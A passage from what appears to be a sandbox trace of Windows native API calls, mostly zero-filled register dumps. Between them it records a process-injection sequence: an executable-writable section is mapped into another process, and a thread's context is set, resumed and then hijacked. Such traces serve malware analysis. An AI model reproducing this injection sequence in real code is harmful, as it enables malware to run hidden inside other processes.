[13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0140.145] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x1a8) returned 0x0 [0140.145] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0x19d200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x75d0000, SectionOffset=0x0, ViewSize=0xde6ac*=0x19e000) returned 0x0 [0140.156] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0x1a0, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0x19d200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0xc00000, SectionOffset=0x0, ViewSize=0xde6e8*=0x19e000) returned 0x0 [0140.195] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x75d0000) returned 0x0 [0140.205] NtClose (Handle=0x1a8) returned 0x0 [0140.205] NtSetContextThread (ThreadHandle=0x1a4, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x35f000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0xd0a717, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0140.233] NtResumeThread (in: ThreadHandle=0x1a4, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0140.233] NtClose (Handle=0x1a0) returned 0x0 [0140.233] NtClose (Handle=0x1a4) returned 0x0 [0140.235] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x11dc, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x1a4) returned 0x0 [0140.235] NtQueryInformationProcess (in: ProcessHandle=0x1a4, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0140.235] NtQueryInformationProcess (in: ProcessHandle=0x1a4, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0140.235] NtReadVirtualMemory (in: ProcessHandle=0x1a4, BaseAddress=0x727000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0140.235] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0140.245] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x11e0) | out: ThreadHandle=0xdea64*=0x1a0) returned 0x0 [0140.246] NtSuspendThread (in: ThreadHandle=0x1a0, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0140.246] NtMapViewOfSection (in: SectionHandle=0x184, ProcessHandle=0x1a4, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x2210000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0140.252] NtGetContextThread (in: ThreadHandle=0x1a0, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x727000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7561895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, 